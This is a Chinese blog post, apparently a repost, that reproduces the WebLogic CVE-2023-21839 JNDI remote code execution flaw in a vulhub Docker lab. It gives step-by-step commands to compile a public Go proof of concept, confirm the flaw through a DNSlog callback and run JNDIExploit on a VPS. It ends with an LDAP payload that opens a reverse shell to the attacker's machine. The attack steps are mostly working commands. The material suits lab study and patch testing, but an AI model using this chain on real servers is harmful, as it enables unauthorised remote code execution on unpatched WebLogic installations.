1.漏洞原理
CVE-2023-21839允许远程用户在未经授权的情况下通过
IIOP/T3
进行
JNDI lookup
操作,当
JDK
版本过低或本地存在小工具(javaSerializedData)时,这可能会导致
RCE
漏洞。
2.环境搭建
环境分为如下情况:
1.攻击机:窗口系统 IP地址:192.168.100.32
2.漏洞机器: dockers服务 IP地址:192.168.220.134
3.VPS机器:博主专项 IP地址:xx.xx.xx.xx :)
漏洞机器环境搭建:
下载项目 vulhub/weblogic/CVE-2023-21839 at master · vulhub/vulhub · GitHub
在当前目录执行命令 docker-compose up -d
完成后环境启动7001端口 访问http://192.168.220.134:7001/console即可
![](https://img-blog.csdnimg.cn/25e1469a951f440c8476a0728cc94ce2.png)
3.漏洞复现
1.准备poc 根据如下项目 GitHub - 4ra1n/CVE-2023-21839: Weblogic CVE-2023-21839 RCE (无需Java依赖一键RCE)
2.安装go环境,本文略过
3.执行编译命令
cd cmd
go build -o CVE-2023-21839.exe
./CVE-2023-21839.exe -ip 192.168.220.134 -port 7001 -ldap ldap://e6pmrj.dnslog.cn/test
4.能够进行dns回显
![](https://img-blog.csdnimg.cn/7451d89078f04a8e923f7f6dbc59a03b.png)
5.vps准备 ,准备JNDIExploit-1.4-SNAPSHOT.jar,为反弹shell做准备
打开vps,一个终端进行端口监听
![](https://img-blog.csdnimg.cn/f20839eec778476c88f3e4dbdde01777.png)
一个终端进行中转JNDIExploit-1.4-SNAPSHOT.jar 下载可以这里 https://download.csdn.net/download/qq_34914659/87512587
命令 java -jar JNDIExploit-1.4-SNAPSHOT.jar -i IP 即可![](https://img-blog.csdnimg.cn/4f4976e9412a4b39b3b58a28aa95cab6.png)
6.然后进行漏洞利用
\CVE-2023-21839.exe -ip 192.168.220.134 -port 7001 -ldap ldap://vpsip:1389/Basic/ReverseShell/vpsip/9999
7.成功反弹shell
参考链接
CVE-2023-21839漏洞本地简单复现
本文转载自: https://blog.csdn.net/qq_34914659/article/details/129258109
版权归原作者 热心市民2022 所有, 如有侵权,请联系我们删除。
版权归原作者 热心市民2022 所有, 如有侵权,请联系我们删除。